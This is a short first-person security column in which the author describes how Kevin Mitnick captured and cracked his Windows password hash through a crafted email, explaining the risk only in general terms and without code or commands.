A few months ago, I participated in a public debate on password policy with my co-worker and friend, Kevin Mitnick. It was a heated back and forth discussion, with Kevin arguing for far longer passwords than most expert sources, including me, recommend. I just wasn’t buying his arguments.
Then he sent me an email that, when I opened it, sent Kevin my Microsoft Windows password hash, which he then cracked. It was a knock-out punch. I didn’t know it was possible.
I was a bit embarrassed, not only that didn’t I know that it could be done, but it was widely known for years. That means red cheeks to any computer security professional, but since I fashion myself as a Windows authentication specialist, doubly embarrassing. Since then, I’ve learned that most computer security professionals don’t know that it can be done.
Cracking the password hash this way is possible because under easy-to-simulate circumstances, embedded links in an email can cause your computer to try authenticating to a remote server. A remote server might then capture your computer’s authentication attempt and use the resulting captured information to find your password hash and begin cracking it.
Said more clearly, I can send you an email and capture your password hash, and then crack it to your plaintext password.